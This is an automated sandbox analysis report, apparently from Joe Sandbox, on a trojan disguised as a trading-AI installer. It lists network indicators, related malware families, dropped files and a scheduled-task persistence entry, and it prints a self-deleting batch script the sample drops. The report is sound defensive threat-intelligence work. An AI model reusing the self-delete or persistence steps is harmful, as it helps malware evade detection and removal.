                                                                                                          • EGA enabled
                                                                                                          • AMSI enabled
                                                                                                          Analysis Mode:default
                                                                                                          Analysis stop reason:Timeout
                                                                                                          Sample name:XS_Trade_AI-newest_release_.exe
                                                                                                          Detection:MAL
                                                                                                          Classification:mal100.troj.spyw.evad.winEXE@31/56@4/4
                                                                                                          EGA Information:
                                                                                                          • Successful, ratio: 80%
                                                                                                          HCA Information:
                                                                                                          • Successful, ratio: 98%
                                                                                                          • Number of executed functions: 94
                                                                                                          • Number of non-executed functions: 197
                                                                                                          Cookbook Comments:
                                                                                                          • Found application associated with file extension: .exe

                                                                                                          Warnings

                                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                          • Execution Graph export aborted for target XS_Trade_AI-newest_release_.tmp, PID 7424 because there are no executed function
                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                          • VT rate limit hit for: XS_Trade_AI-newest_release_.exe

                                                                                                          Simulations

                                                                                                          Behavior and APIs

                                                                                                          TimeTypeDescription
                                                                                                          10:49:46API Interceptor2x Sleep call for process: XS_Trade_AI-newest_release_.tmp modified
                                                                                                          10:50:06API Interceptor7x Sleep call for process: ngentask.exe modified
                                                                                                          14:49:52Task SchedulerRun new task: DropboxSyncTaskMachineUA path: %localappdata%\programs\common\taskshosts.exe

                                                                                                          Joe Sandbox View / Context

                                                                                                          IPs

                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                          164.132.58.105sims-4-updater-v1.3.4.exeGet hashmaliciousUnknownBrowse
                                                                                                            RedEngine.exeGet hashmaliciousBabadeda, RedLineBrowse
                                                                                                              setup.exeGet hashmaliciousBabadeda, RHADAMANTHYS, RedLineBrowse
                                                                                                                8MO5hfPa8d.exeGet hashmaliciousAsyncRAT, Clipboard HijackerBrowse
                                                                                                                  SecuriteInfo.com.HEUR.Trojan.MSIL.Agent.gen.12009.5536.exeGet hashmaliciousAsyncRAT, Clipboard HijackerBrowse
                                                                                                                    DLL_Injector_Resou_nls..scr.exeGet hashmaliciousAsyncRAT, Clipboard Hijacker, zgRATBrowse
                                                                                                                      SynapseX_injector.exeGet hashmaliciousPython Stealer, MicroClipBrowse
                                                                                                                        2PKbNS1Q41.exeGet hashmaliciousPython StealerBrowse
                                                                                                                          3yypk0NA7b.exeGet hashmaliciousUnknownBrowse
                                                                                                                            1budjNuX0E.exeGet hashmaliciousUnknownBrowse
                                                                                                                              104.18.111.161vF20HtY4a4.exeGet hashmaliciousUnknownBrowse
                                                                                                                              • tinyurl.com/bdhpvpny
                                                                                                                              VvPrGsGGWH.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                                              • tinyurl.com/muewsc78
                                                                                                                              5UIy3bo46y.dllGet hashmaliciousUnknownBrowse
                                                                                                                              • tinyurl.com/yeykydun
                                                                                                                              BeginSync lnk.lnkGet hashmaliciousUnknownBrowse
                                                                                                                              • tinyurl.com/yeykydun
                                                                                                                              SecuriteInfo.com.Win64.MalwareX-gen.11827.5130.dllGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                                              • tinyurl.com/yk3s8ubp

                                                                                                                              Domains

                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                              tinyurl.comhttps://2007.filemail.com/api/file/get?filekey=58mKUrTMdlmzqkRvo0UdVa2TMjJTCQiSNv5rUBtsDQTNU0dM4JzppUJaOrP_mWxCym0k9l5xEDeaXunPsHq6frY8XZH_gnclw86MefA3bpAlGuDkr77-xSqrMOQIlMdW5cRjwoOSCWIlTwpC48cNKMMHhMKp&track=P8fpm4ry&pk_vid=8a8b18f03738ae4f17297703684d559dGet hashmaliciousHTMLPhisherBrowse
                                                                                                                              • 104.17.112.233
                                                                                                                              http://hotautodetail.com/goe-=bleass=america=donal=q82h-=1Get hashmaliciousUnknownBrowse
                                                                                                                              • 104.18.111.161
                                                                                                                              vF20HtY4a4.exeGet hashmaliciousUnknownBrowse
                                                                                                                              • 104.17.112.233
                                                                                                                              vF20HtY4a4.exeGet hashmaliciousUnknownBrowse
                                                                                                                              • 104.18.111.161
                                                                                                                              VvPrGsGGWH.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                                              • 104.18.111.161
                                                                                                                              5UIy3bo46y.dllGet hashmaliciousUnknownBrowse
                                                                                                                              • 104.18.111.161
                                                                                                                              HQsitBLlOv.dllGet hashmaliciousUnknownBrowse
                                                                                                                              • 104.17.112.233
                                                                                                                              BeginSync lnk.lnkGet hashmaliciousUnknownBrowse
                                                                                                                              • 104.18.111.161
                                                                                                                              https://tinyurl.com/y9r5fvasGet hashmaliciousUnknownBrowse
                                                                                                                              • 104.17.112.233
                                                                                                                              https://tinyurl.com/5xa2ubd7Get hashmaliciousUnknownBrowse
                                                                                                                              • 104.17.112.233
                                                                                                                              rentry.orgsims-4-updater-v1.3.4.exeGet hashmaliciousUnknownBrowse
                                                                                                                              • 164.132.58.105
                                                                                                                              RedEngine.exeGet hashmaliciousBabadeda, RedLineBrowse
                                                                                                                              • 164.132.58.105
                                                                                                                              AtlasLoader.exeGet hashmaliciousUnknownBrowse
                                                                                                                              • 198.251.88.130
                                                                                                                              AtlasLoader.exeGet hashmaliciousUnknownBrowse
                                                                                                                              • 198.251.88.130
                                                                                                                              LX.exeGet hashmaliciousUnknownBrowse
                                                                                                                              • 198.251.88.130
                                                                                                                              lucim.exeGet hashmaliciousXmrigBrowse
                                                                                                                              • 198.251.88.130
                                                                                                                              Activator.exeGet hashmaliciousXmrigBrowse
                                                                                                                              • 198.251.88.130
                                                                                                                              EzLoader.exeGet hashmaliciousRHADAMANTHYS, XmrigBrowse
                                                                                                                              • 198.251.88.130
                                                                                                                              LolixLoader.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                              • 198.251.88.130
                                                                                                                              gnu128gsui782.exeGet hashmaliciousLaplas Clipper, RHADAMANTHYSBrowse
                                                                                                                              • 107.189.8.5

                                                                                                                              ASNs

                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                              CLOUDFLARENETUShttps://gofile.io/d/IAr464Get hashmaliciousUnknownBrowse
                                                                                                                              • 172.67.134.234
                                                                                                                              rpurchasyinquiry.exeGet hashmaliciousFormBookBrowse
                                                                                                                              • 172.67.148.133
                                                                                                                              https://gofile.io/d/IAr464Get hashmaliciousPhisherBrowse
                                                                                                                              • 104.21.25.239
                                                                                                                              https://dl.dropboxusercontent.com/scl/fi/95is2w1ywjvorzayt88dp/DKM-0192PDF.zip?rlkey=svoej4s4tb5lwbnvthtgrmokl&st=d99zdn1k&dl=0Get hashmaliciousAbobus ObfuscatorBrowse
                                                                                                                              • 104.16.230.132
                                                                                                                              https://gofile.io/d/IAr464Get hashmaliciousUnknownBrowse
                                                                                                                              • 188.114.97.3
                                                                                                                              file.exeGet hashmaliciousLummaCBrowse
                                                                                                                              • 188.114.96.3
                                                                                                                              EwKKdCrEDu.exeGet hashmaliciousUnknownBrowse
                                                                                                                              • 188.114.96.3
                                                                                                                              EwKKdCrEDu.exeGet hashmaliciousUnknownBrowse
                                                                                                                              • 188.114.97.3
                                                                                                                              Salary_Structure_Benefits_for_I.e.van.groenesteinIyNURVhUTlVNUkFORE9NMTkjIw==.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                              • 104.17.25.14
                                                                                                                              Salary_Structure_Benefits_for_SridenourIyNURVhUTlVNUkFORE9NMTkjIw==.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                              • 188.114.96.3
                                                                                                                              OVHFRhttps://gofile.io/d/IAr464Get hashmaliciousUnknownBrowse
                                                                                                                              • 51.75.242.210
                                                                                                                              rpurchasyinquiry.exeGet hashmaliciousFormBookBrowse
                                                                                                                              • 176.31.209.107
                                                                                                                              https://gofile.io/d/IAr464Get hashmaliciousPhisherBrowse
                                                                                                                              • 51.75.242.210
                                                                                                                              https://gofile.io/d/IAr464Get hashmaliciousUnknownBrowse
                                                                                                                              • 51.75.242.210
                                                                                                                              nabarm5.elfGet hashmaliciousUnknownBrowse
                                                                                                                              • 176.31.46.106
                                                                                                                              la.bot.sparc.elfGet hashmaliciousUnknownBrowse
                                                                                                                              • 51.255.137.225
                                                                                                                              nabmips.elfGet hashmaliciousUnknownBrowse
                                                                                                                              • 51.77.11.185
                                                                                                                              la.bot.arm7.elfGet hashmaliciousUnknownBrowse
                                                                                                                              • 54.36.111.116
                                                                                                                              jklmips.elfGet hashmaliciousUnknownBrowse
                                                                                                                              • 51.81.7.180
                                                                                                                              splarm5.elfGet hashmaliciousUnknownBrowse
                                                                                                                              • 178.32.165.89
                                                                                                                              CLOUDFLARENETUShttps://gofile.io/d/IAr464Get hashmaliciousUnknownBrowse
                                                                                                                              • 172.67.134.234
                                                                                                                              rpurchasyinquiry.exeGet hashmaliciousFormBookBrowse
                                                                                                                              • 172.67.148.133
                                                                                                                              https://gofile.io/d/IAr464Get hashmaliciousPhisherBrowse
                                                                                                                              • 104.21.25.239
                                                                                                                              https://dl.dropboxusercontent.com/scl/fi/95is2w1ywjvorzayt88dp/DKM-0192PDF.zip?rlkey=svoej4s4tb5lwbnvthtgrmokl&st=d99zdn1k&dl=0Get hashmaliciousAbobus ObfuscatorBrowse
                                                                                                                              • 104.16.230.132
                                                                                                                              https://gofile.io/d/IAr464Get hashmaliciousUnknownBrowse
                                                                                                                              • 188.114.97.3
                                                                                                                              file.exeGet hashmaliciousLummaCBrowse
                                                                                                                              • 188.114.96.3
                                                                                                                              EwKKdCrEDu.exeGet hashmaliciousUnknownBrowse
                                                                                                                              • 188.114.96.3
                                                                                                                              EwKKdCrEDu.exeGet hashmaliciousUnknownBrowse
                                                                                                                              • 188.114.97.3
                                                                                                                              Salary_Structure_Benefits_for_I.e.van.groenesteinIyNURVhUTlVNUkFORE9NMTkjIw==.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                              • 104.17.25.14
                                                                                                                              Salary_Structure_Benefits_for_SridenourIyNURVhUTlVNUkFORE9NMTkjIw==.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                              • 188.114.96.3
                                                                                                                              HETZNER-ASDEhttps://gofile.io/d/IAr464Get hashmaliciousUnknownBrowse
                                                                                                                              • 213.239.209.209
                                                                                                                              https://gofile.io/d/IAr464Get hashmaliciousPhisherBrowse
                                                                                                                              • 144.76.38.164
                                                                                                                              https://gofile.io/d/IAr464Get hashmaliciousUnknownBrowse
                                                                                                                              • 213.239.209.209
                                                                                                                              nabspc.elfGet hashmaliciousUnknownBrowse
                                                                                                                              • 176.9.43.60
                                                                                                                              la.bot.arm7.elfGet hashmaliciousUnknownBrowse
                                                                                                                              • 116.203.104.203
                                                                                                                              CQlUZ4KuAa.exeGet hashmaliciousVidarBrowse
                                                                                                                              • 116.202.182.67
                                                                                                                              9yJSTTEg68.exeGet hashmaliciousVidarBrowse
                                                                                                                              • 135.181.31.18
                                                                                                                              dZIZhRHDXv.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                              • 138.201.226.224
                                                                                                                              nklmpsl.elfGet hashmaliciousUnknownBrowse
                                                                                                                              • 5.75.234.236
                                                                                                                              splppc.elfGet hashmaliciousUnknownBrowse
                                                                                                                              • 144.77.227.183

                                                                                                                              JA3 Fingerprints

                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                              a0e9f5d64349fb13191bc781f81f42e1https://dl.dropboxusercontent.com/scl/fi/95is2w1ywjvorzayt88dp/DKM-0192PDF.zip?rlkey=svoej4s4tb5lwbnvthtgrmokl&st=d99zdn1k&dl=0Get hashmaliciousAbobus ObfuscatorBrowse
                                                                                                                              • 164.132.58.105
                                                                                                                              • 104.18.111.161
                                                                                                                              • 104.21.83.166
                                                                                                                              file.exeGet hashmaliciousLummaCBrowse
                                                                                                                              • 164.132.58.105
                                                                                                                              • 104.18.111.161
                                                                                                                              • 104.21.83.166
                                                                                                                              file.exeGet hashmaliciousLummaCBrowse
                                                                                                                              • 164.132.58.105
                                                                                                                              • 104.18.111.161
                                                                                                                              • 104.21.83.166
                                                                                                                              Okfjk1hs4kdhs2.exeGet hashmaliciousLummaCBrowse
                                                                                                                              • 164.132.58.105
                                                                                                                              • 104.18.111.161
                                                                                                                              • 104.21.83.166
                                                                                                                              file.exeGet hashmaliciousLummaCBrowse
                                                                                                                              • 164.132.58.105
                                                                                                                              • 104.18.111.161
                                                                                                                              • 104.21.83.166
                                                                                                                              file.exeGet hashmaliciousLummaCBrowse
                                                                                                                              • 164.132.58.105
                                                                                                                              • 104.18.111.161
                                                                                                                              • 104.21.83.166
                                                                                                                              file.exeGet hashmaliciousLummaCBrowse
                                                                                                                              • 164.132.58.105
                                                                                                                              • 104.18.111.161
                                                                                                                              • 104.21.83.166
                                                                                                                              NetCDF4Excel_3_3_setup.exeGet hashmaliciousUnknownBrowse
                                                                                                                              • 164.132.58.105
                                                                                                                              • 104.18.111.161
                                                                                                                              • 104.21.83.166
                                                                                                                              file.exeGet hashmaliciousLummaCBrowse
                                                                                                                              • 164.132.58.105
                                                                                                                              • 104.18.111.161
                                                                                                                              • 104.21.83.166
                                                                                                                              file.exeGet hashmaliciousLummaCBrowse
                                                                                                                              • 164.132.58.105
                                                                                                                              • 104.18.111.161
                                                                                                                              • 104.21.83.166
                                                                                                                              37f463bf4616ecd445d4a1937da06e19W9f3Fx6sL4.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                              • 135.181.116.240
                                                                                                                              Fa24c148.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                              • 135.181.116.240
                                                                                                                              Lista produkt#U00f3w POL56583753Sarchmentdoc.batGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                              • 135.181.116.240
                                                                                                                              RFQ_List.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                              • 135.181.116.240
                                                                                                                              rFa24c148.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                              • 135.181.116.240
                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, XWormBrowse
                                                                                                                              • 135.181.116.240
                                                                                                                              file.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                              • 135.181.116.240
                                                                                                                              CQlUZ4KuAa.exeGet hashmaliciousVidarBrowse
                                                                                                                              • 135.181.116.240
                                                                                                                              yt5xqAvHnZ.exeGet hashmaliciousVidarBrowse
                                                                                                                              • 135.181.116.240
                                                                                                                              9yJSTTEg68.exeGet hashmaliciousVidarBrowse
                                                                                                                              • 135.181.116.240

                                                                                                                              Dropped Files

                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI78242\_asyncio.pydbB0yJfzf0t.exeGet hashmaliciousLummaCBrowse
                                                                                                                                C:\Users\user\AppData\Local\Temp\_MEI78242\VCRUNTIME140.dllbB0yJfzf0t.exeGet hashmaliciousLummaCBrowse
                                                                                                                                  https://downloads.linktek.com/LR/SetupLinkReporter.zipGet hashmaliciousUnknownBrowse
                                                                                                                                    cb1fcb3a3d30ed68e82b6b2a3499c4d07cf4c73ea4f67.exeGet hashmaliciousGo Injector, Stealc, VidarBrowse
                                                                                                                                      a3.cmdGet hashmaliciousUnknownBrowse
                                                                                                                                        ELF2o7c93F.exeGet hashmaliciousUnknownBrowse
                                                                                                                                          microclaudia-unizar.1.6.exeGet hashmaliciousUnknownBrowse

                                                                                                                                            Created / dropped Files

                                                                                                                                            C:\Users\user\AppData\Local\Programs\Common\yyttrsu.exe

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.exe
                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):7278842
                                                                                                                                            Entropy (8bit):7.990664825715479
                                                                                                                                            Encrypted:true
                                                                                                                                            SSDEEP:196608:7oM3NxnG5lNniIbZg4TYc1vR31A4zur5MOjjDDTTVYc/B1OapE41:7oM0bPH1AJYc/1r
                                                                                                                                            MD5:8055CC6C758BEA5F7084A80810953D28
                                                                                                                                            SHA1:D11DB4254AF4EA62FE95C6DEED9FD4235010E8BA
                                                                                                                                            SHA-256:32AAD8224EAE5459AC58BC9C3EA54505E182FE783B598E241EEB911854B7378B
                                                                                                                                            SHA-512:AB7F321C679D9D922ECD7CBCFF1C45A37203FBC36FCD2A5879B750596370BA39FCEF2D89B80CF52504691C0FC9F10E3970F064EA1C05484DFA56AFD0C477270F
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m.pQ)j..)j..)j..=...%j..=....j..=...;j..O...-j..{....j..{...;j..{...;j..=..."j..)j...j......:j......(j..Rich)j..................PE..L...?..g..........".................|........0....@.......................... .......Po...@.................................\...x...................................................................(...@............0...............................text...H........................... ..`.rdata.......0......................@..@.data...t...........................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\.cmd

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmp
                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):146
                                                                                                                                            Entropy (8bit):4.650300270451998
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:HOt+WfW92LAPpPR6QOrsMD2Ut+WfW92LAPpPR6QOraKRew2sn:uwvUeUxrsMD2UwvUeUxra0xn
                                                                                                                                            MD5:FB05934F5A2978C1EDE279F7B0192977
                                                                                                                                            SHA1:406F8097FC11EA99819F380E22B0D9D5AA551381
                                                                                                                                            SHA-256:8B560BE87E7567BA2BC32C69FCC64F6B9568E645F93165A56BCCA0F03F1BA404
                                                                                                                                            SHA-512:19D24EEF294678BBEFB807748D81C9E8F5B6CA9A7CEBB7358449CCE8E2BD1A232B981E93730F420663A741347169605DFD95574405D34017977F0F1C579F306C
                                                                                                                                            Malicious:false
                                                                                                                                            Preview::d..del "C:\Users\user\Desktop\XS_Trade_AI-newest_release_.exe"..if exist "C:\Users\user\Desktop\XS_Trade_AI-newest_release_.exe" goto d..del %0

                                                                                                                                            C:\Users\user\AppData\Local\Temp\_MEI78242\VCRUNTIME140.dll

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe
                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):76168
                                                                                                                                            Entropy (8bit):6.763747567766442
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:O6HuqvERNjBwySXtVaSvrgOFw9RxKMnMecbCIdFr:O6HZMRNjKySdLcOiHMecbCId
                                                                                                                                            MD5:31CE620CB32AC950D31E019E67EFC638
                                                                                                                                            SHA1:EAF02A203BC11D593A1ADB74C246F7A613E8EF09
                                                                                                                                            SHA-256:1E0F8F7F13502F5CEE17232E9BEBCA7B44DD6EC29F1842BB61033044C65B2BBF
                                                                                                                                            SHA-512:603E8DCEDA4CB5B3317020E71F1951D01ACE045468EAF118B422F4F44B8B6B2794F5002EA2E3FE9107C222E4CB55B932ED0D897A1871976D75F8EE10D5D12374
                                                                                                                                            Malicious:false
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Joe Sandbox View:
                                                                                                                                            • Filename: bB0yJfzf0t.exe, Detection: malicious, Browse
                                                                                                                                            • Filename: , Detection: malicious, Browse
                                                                                                                                            • Filename: cb1fcb3a3d30ed68e82b6b2a3499c4d07cf4c73ea4f67.exe, Detection: malicious, Browse
                                                                                                                                            • Filename: a3.cmd, Detection: malicious, Browse
                                                                                                                                            • Filename: ELF2o7c93F.exe, Detection: malicious, Browse
                                                                                                                                            • Filename: microclaudia-unizar.1.6.exe, Detection: malicious, Browse
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................{.........i.............................................................Rich....................PE..L...J(.`.........."!.........................................................@............@A......................................... ...................#...0.......#..8............................#..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc........ ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\_MEI78242\_asyncio.pyd

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe
                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):59112
                                                                                                                                            Entropy (8bit):6.494573911771512
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:qufUQUmEd6LO3wKb/Oz+B7RgjtWZhI8YnFcCByjWH:qWzlErbWI7RgjtWZhI8Yn2mH
                                                                                                                                            MD5:24B4C187E01530FA52F71DA2D158178C
                                                                                                                                            SHA1:C1AC16956FD2A2AE9209FD83E27D590306F959B0
                                                                                                                                            SHA-256:62744AA604A54F38EA4C5A5C538B51AB2F81EB14175101EB1D0E4381B33F996B
                                                                                                                                            SHA-512:DCA850EDC23923E69212A4786CF6CB4B9BA3BB3D931667848232A0975717FB3ED396265D787EC1D4992288C3FEFE2B700AA1FDC41361AD8D568B43EFF29B0A6E
                                                                                                                                            Malicious:false
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Joe Sandbox View:
                                                                                                                                            • Filename: bB0yJfzf0t.exe, Detection: malicious, Browse
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........R?..3Q..3Q..3Q..K...3Q.FP..3Q.FT..3Q.FU..3Q.FR..3Q.hFP..3Q..XP..3Q..3P.3Q.hFY..3Q.hFQ..3Q.hF...3Q.hFS..3Q.Rich.3Q.........................PE..L...d:-a...........!.....f...d.......e..............................................N.....@.............................P...P...d......................................T...........................H...@............................................text...)e.......f.................. ..`.rdata...8.......:...j..............@..@.data...............................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\_MEI78242\_bz2.pyd

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe
                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):78568
                                                                                                                                            Entropy (8bit):6.692548823172262
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:2whkLX4/bkMzMIXSycT+ar1AS8bVMS4BpI8MV55CbyjvU:25LEkMzvX2DOlbVMS4BpI8MVeWU
                                                                                                                                            MD5:9137B258EAF602482EB7DFDEEDFDF795
                                                                                                                                            SHA1:4AA311984C98ACF024AC446C434905864E7BBBEB
                                                                                                                                            SHA-256:3FF08CFA9F6687D68D78FE1A5C0AF6E5396E6FE506C14D23C538316CCA71A6AB
                                                                                                                                            SHA-512:79493AB0254A6CB56F998BBBC63F5D471E0A3F8709E745EE0EB0DF5D8DC6222EF38EA262A97907BB06281B3E8D6572286A0DF5E8D82F984878263720F0FCB8E6
                                                                                                                                            Malicious:false
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......j..:...i...i...i'.wi$..i|..h,..iH..i-..i|..h"..i|..h$..i|..h,..i...h-..i:..h,..i...is..i...h&..i...h/..i...i/..i...h/..iRich...i........................PE..L....:-a...........!.........L...............................................P............@......................... ...H...h........0.......................@......@...T...............................@............................................text............................... ..`.rdata..X1.......2..................@..@.data...H.... ......................@....rsrc........0......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\_MEI78242\_ctypes.pyd

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe
                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):116968
                                                                                                                                            Entropy (8bit):6.58820716147258
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3072:qeLRlXrhZu6mLXV0Q/Z6flqCBAlI8BPW8srEy:qeLrX9JiCQ/Z6fMC6uEy
                                                                                                                                            MD5:DE2F88B18FABE8586C38074B6FB80873
                                                                                                                                            SHA1:CF4B533FFEB9792B33516EC05D3375260FF32B98
                                                                                                                                            SHA-256:F5480114CF3118E561C4DC55CB733F9D06FAE897875D91BB324263B4AEDD31B9
                                                                                                                                            SHA-512:3D89CCC9F9D6BCA35F2CE5DBDAFF2FD571C3E4C89056AEC4DE97466AEA49D5BD9C7DE0A0D345F249F1A33B43597F9C3A1687DA246F6C832434391638A10DCD04
                                                                                                                                            Malicious:false
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......{...?|.?|.?|.6.[.9|.m..=|.m..4|.m..5|.m..:|....=|.+..>|.+..9|....<|.?|..|.....9|....>|...7.>|....>|.Rich?|.................PE..L...y:-a...........!.........................0............................................@..........................f......$g......................................xa..T............................a..@............0...............................text............................... ..`.rdata...N...0...P..................@..@.data................f..............@....rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\_MEI78242\_decimal.pyd

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe
                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):230632
                                                                                                                                            Entropy (8bit):6.857972259618523
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6144:7+CdBO+WLvRxuFcQAHe0nDx3tUftGuq6xx3XMW5gZrWCi7:7/7O/LRxuFcQYlDx3taLOWCw
                                                                                                                                            MD5:334D5A5D7B73C7D157762EB290F3AC48
                                                                                                                                            SHA1:716AE2CE10270CB474A6B1787E5C98662AE902EC
                                                                                                                                            SHA-256:0AB918574B6404FC37B577E2FDDA8B1515FBF198E86C10C6011F708E88A79EF7
                                                                                                                                            SHA-512:E830002BD4DDA7D55A1807EA2380A3A46BEF6CAF7DFA5D5028306076EA3B3BF56446196842B926D77244B8B7571AC489109737D0C5F8855896202D376F39297A
                                                                                                                                            Malicious:false
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......?..c{..0{..0{..0r.:0u..0).1y..0).1w..0).1q..0).1...0..1x..0o.1y..0{..0.0..1t..0..1z..0..V0z..0..1z..0Rich{..0........PE..L...i:-a...........!................................................................AU....@.............................P............`...............h.......p..."...)..T...........................@*..@............................................text.............................. ..`.rdata..............................@..@.data........@.......(..............@....rsrc........`.......:..............@..@.reloc..."...p...$...D..............@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\_MEI78242\_hashlib.pyd

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe
                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):52456
                                                                                                                                            Entropy (8bit):6.648093374061067
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:GFRegVllNvo/j+X+oOPCGGtQhI8YIHezUl9wJDG4y3hHA:GRegvre+Or6GGChI8YIHr2yFA
                                                                                                                                            MD5:3AD5E39CBE6354BB1CE82E29D4B2C072
                                                                                                                                            SHA1:C4A18CE9E803CA6A7E33F1BEF422F5006DF651FF
                                                                                                                                            SHA-256:EDDEEDD5FD8A1C49ECAAB51FF5117D9FB1FED5637E8CA31F35698BC6D68CA39D
                                                                                                                                            SHA-512:A9ECAB892469C79B50B7C1C79394BB96FCB10BEAB03114961BE5C0C05622765C0F105856065988ED31A7D21911D91C7A5FCDF4A9D33AC35AB99BA5550E91A823
                                                                                                                                            Malicious:false
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
